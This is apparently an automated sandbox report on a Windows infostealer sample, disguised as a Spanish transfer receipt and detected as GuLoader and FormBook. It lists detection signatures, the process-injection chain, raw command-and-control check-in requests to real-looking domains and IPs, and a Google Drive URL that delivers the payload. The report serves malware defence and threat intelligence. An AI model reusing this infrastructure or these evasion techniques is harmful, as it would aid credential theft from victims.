Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
justificante de transferencia09454545.exe

Overview

General Information

Sample name:justificante de transferencia09454545.exe
Analysis ID:1630919
MD5:6570f5a2315ed744c1136a67f824b37e
SHA1:6becc54c615e1fc880c67e2cd80b2895f45b0549
SHA256:1d5034d169fb180073177fe671f18115b2ca47742a094231c1eb416ffba2a06d
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • justificante de transferencia09454545.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\justificante de transferencia09454545.exe" MD5: 6570F5A2315ED744C1136A67F824B37E)
    • justificante de transferencia09454545.exe (PID: 3916 cmdline: "C:\Users\user\Desktop\justificante de transferencia09454545.exe" MD5: 6570F5A2315ED744C1136A67F824B37E)
      • Ll3N65UXbvloyqJVc8Qu.exe (PID: 3484 cmdline: "C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\ZttFMgUcl.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • icsunattend.exe (PID: 2208 cmdline: "C:\Windows\SysWOW64\icsunattend.exe" MD5: 6D01FCE30EF8A2CA0D385593E90879E5)
          • Ll3N65UXbvloyqJVc8Qu.exe (PID: 2680 cmdline: "C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\re1mc49u.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 5732 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3871614369.0000000005410000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.3868536382.0000000000C30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.3869133964.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3424297111.0000000036610000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3869289040.0000000003210000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-06T12:58:09.137490+010020507451Malware Command and Control Activity Detected192.168.2.1049709188.114.96.380TCP
            2025-03-06T12:58:34.413131+010020507451Malware Command and Control Activity Detected192.168.2.104971346.38.243.23480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-06T12:57:33.320664+010028032702Potentially Bad Traffic192.168.2.1049707142.250.186.78443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-06T12:58:09.137490+010028554651A Network Trojan was detected192.168.2.1049709188.114.96.380TCP
            2025-03-06T12:58:34.413131+010028554651A Network Trojan was detected192.168.2.104971346.38.243.23480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-06T12:58:25.727408+010028554641A Network Trojan was detected192.168.2.104971046.38.243.23480TCP
            2025-03-06T12:58:28.274266+010028554641A Network Trojan was detected192.168.2.104971146.38.243.23480TCP
            2025-03-06T12:58:30.836962+010028554641A Network Trojan was detected192.168.2.104971246.38.243.23480TCP
            2025-03-06T12:58:39.957906+010028554641A Network Trojan was detected192.168.2.104971413.248.169.4880TCP
            2025-03-06T12:58:42.496002+010028554641A Network Trojan was detected192.168.2.104971513.248.169.4880TCP
            2025-03-06T12:58:45.480932+010028554641A Network Trojan was detected192.168.2.104971613.248.169.4880TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: justificante de transferencia09454545.exeAvira: detected
            Source: http://www.kdjsswzx.club/myab/?MP=NdxOYJDJG4lm+JEaKG3C3Lbnwt5J/jX7V01w+cJuJBraytzWaHOc0QEGm1yXIwrAoNttsMOQwUptf8Glw1EAh4LN1ggO1axYIhZB7gb+MpY69764OA==&vv=hBoditAvira URL Cloud: Label: malware
            Source: justificante de transferencia09454545.exeVirustotal: Detection: 52%Perma Link
            Source: justificante de transferencia09454545.exeReversingLabs: Detection: 52%
            Source: Yara matchFile source: 0000000A.00000002.3871614369.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3868536382.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3869133964.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424297111.0000000036610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3869289040.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424665808.00000000376C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3870609350.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: justificante de transferencia09454545.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.10:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: Binary string: mshtml.pdb source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: justificante de transferencia09454545.exe, 00000006.00000003.3305661830.0000000036614000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036B0E000.00000040.00001000.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3307432584.00000000367C9000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036970000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: justificante de transferencia09454545.exe, justificante de transferencia09454545.exe, 00000006.00000003.3305661830.0000000036614000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036B0E000.00000040.00001000.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3307432584.00000000367C9000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036970000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe
            Source: Binary string: icsunattend.pdbGCTL source: justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006746000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: icsunattend.pdb source: justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006746000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_0040572C CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_0040572C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_004061E0 FindFirstFileW,FindClose,1_2_004061E0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_00402706 FindFirstFileW,1_2_00402706
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C4C670 FindFirstFileW,FindNextFileW,FindClose,9_2_00C4C670
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 4x nop then xor eax, eax9_2_00C39F70
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 4x nop then mov ebx, 00000004h9_2_04AB04E6

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49709 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49709 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49713 -> 46.38.243.234:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49713 -> 46.38.243.234:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49712 -> 46.38.243.234:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 46.38.243.234:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 46.38.243.234:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49716 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 13.248.169.48:80
            Source: DNS query: www.meacci.xyz
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49707 -> 142.250.186.78:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1jw3MrypYqcSLldFrfnQRnH3vme5CWipi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1jw3MrypYqcSLldFrfnQRnH3vme5CWipi&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /myab/?MP=NdxOYJDJG4lm+JEaKG3C3Lbnwt5J/jX7V01w+cJuJBraytzWaHOc0QEGm1yXIwrAoNttsMOQwUptf8Glw1EAh4LN1ggO1axYIhZB7gb+MpY69764OA==&vv=hBodit HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kdjsswzx.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pdkf/?MP=v9TvKxT28zL0n3FeWKYO+eE/ASIVOag3Ng0hhWGKcXd5vJTo18Hxc8e/9Ju6EPpLsanayU2m+iyldJvZWasLNBEJlMzqGHMofEZtXkMzjbwL79PIIg==&vv=hBodit HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.intention.digitalConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: www.kdjsswzx.club
            Source: global trafficDNS traffic detected: DNS query: www.intention.digital
            Source: global trafficDNS traffic detected: DNS query: www.meacci.xyz
            Source: unknownHTTP traffic detected: POST /pdkf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.intention.digitalOrigin: http://www.intention.digitalContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 191Referer: http://www.intention.digital/pdkf/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36Data Raw: 4d 50 3d 69 2f 37 50 4a 42 72 7a 74 79 33 65 69 51 55 74 4e 71 63 50 76 34 67 77 47 42 35 34 63 59 46 2f 42 53 5a 65 67 46 47 59 43 6b 31 66 38 71 4c 4c 35 76 72 47 54 71 57 35 7a 4b 61 49 4a 2f 5a 43 69 64 4c 36 33 69 75 6e 7a 79 37 57 65 49 79 39 65 4b 4d 76 55 68 6b 6f 67 76 66 30 51 6b 77 64 56 7a 70 6b 47 67 51 75 74 4c 55 75 2b 76 6d 2f 65 70 35 2b 4d 43 4f 36 50 73 6e 50 49 52 44 53 59 56 52 48 6c 77 7a 79 62 4e 49 79 72 6b 4c 59 77 44 6e 4c 53 73 4f 64 6d 5a 39 4a 4c 74 39 52 54 42 75 45 6e 6b 76 34 51 71 33 67 6d 33 5a 4e 2f 31 70 31 38 66 47 47 74 61 61 35 Data Ascii: MP=i/7PJBrzty3eiQUtNqcPv4gwGB54cYF/BSZegFGYCk1f8qLL5vrGTqW5zKaIJ/ZCidL63iunzy7WeIy9eKMvUhkogvf0QkwdVzpkGgQutLUu+vm/ep5+MCO6PsnPIRDSYVRHlwzybNIyrkLYwDnLSsOdmZ9JLt9RTBuEnkv4Qq3gm3ZN/1p18fGGtaa5
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 11:55:15 GMTServer: Apache/2.4.10 (Debian)Content-Length: 283Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 69 6e 74 65 6e 74 69 6f 6e 2e 64 69 67 69 74 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.intention.digital Port 80</address></body></html>
            Source: justificante de transferencia09454545.exe, 00000001.00000002.3068553615.0000000000409000.00000004.00000001.01000000.00000003.sdmp, justificante de transferencia09454545.exe, 00000001.00000000.1413258489.0000000000409000.00000008.00000001.01000000.00000003.sdmp, justificante de transferencia09454545.exe, 00000006.00000000.3067425197.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3168510959.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3168454231.0000000006763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: justificante de transferencia09454545.exe, 00000006.00000002.3400788425.00000000066D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: justificante de transferencia09454545.exe, 00000006.00000002.3400788425.0000000006716000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3400788425.00000000066D8000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3423891407.0000000035C90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1jw3MrypYqcSLldFrfnQRnH3vme5CWipi
            Source: justificante de transferencia09454545.exe, 00000006.00000002.3400788425.00000000066D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1jw3MrypYqcSLldFrfnQRnH3vme5CWipi#Hj
            Source: justificante de transferencia09454545.exe, 00000006.00000002.3400788425.0000000006716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1jw3MrypYqcSLldFrfnQRnH3vme5CWipiyp
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3305892141.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3230357099.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3168510959.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006729000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3230357099.0000000006746000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3168454231.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3305935174.000000000672F000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3306092141.000000000673F000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006746000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3306150324.0000000006749000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3305935174.0000000006727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1jw3MrypYqcSLldFrfnQRnH3vme5CWipi&export=download
            Source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3168510959.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3168454231.0000000006763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3168510959.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3168454231.0000000006763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3168510959.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3168454231.0000000006763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3168510959.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3168454231.0000000006763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3168510959.0000000006763000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3168454231.0000000006763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.10:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_00405290 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405290

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3871614369.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3868536382.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3869133964.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424297111.0000000036610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3869289040.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424665808.00000000376C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3870609350.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E35C0 NtCreateMutant,LdrInitializeThunk,6_2_369E35C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_369E2C70
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_369E2DF0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E3090 NtSetValueKey,6_2_369E3090
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E3010 NtOpenDirectoryObject,6_2_369E3010
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E3D10 NtOpenProcessToken,6_2_369E3D10
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E3D70 NtOpenThread,6_2_369E3D70
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E39B0 NtGetContextThread,6_2_369E39B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E4650 NtSuspendThread,6_2_369E4650
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E4340 NtSetContextThread,6_2_369E4340
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2E80 NtReadVirtualMemory,6_2_369E2E80
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2EA0 NtAdjustPrivilegesToken,6_2_369E2EA0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2EE0 NtQueueApcThread,6_2_369E2EE0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2E30 NtWriteVirtualMemory,6_2_369E2E30
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2F90 NtProtectVirtualMemory,6_2_369E2F90
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2FB0 NtResumeThread,6_2_369E2FB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2FA0 NtQuerySection,6_2_369E2FA0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2FE0 NtCreateFile,6_2_369E2FE0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2F30 NtCreateSection,6_2_369E2F30
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2F60 NtCreateProcessEx,6_2_369E2F60
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2CA0 NtQueryInformationToken,6_2_369E2CA0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2CC0 NtQueryVirtualMemory,6_2_369E2CC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2CF0 NtOpenProcess,6_2_369E2CF0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2C00 NtQueryInformationProcess,6_2_369E2C00
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2C60 NtCreateKey,6_2_369E2C60
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2DB0 NtEnumerateKey,6_2_369E2DB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2DD0 NtDelayExecution,6_2_369E2DD0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E2D10 NtMapViewOfSection,6_2_369E2D10
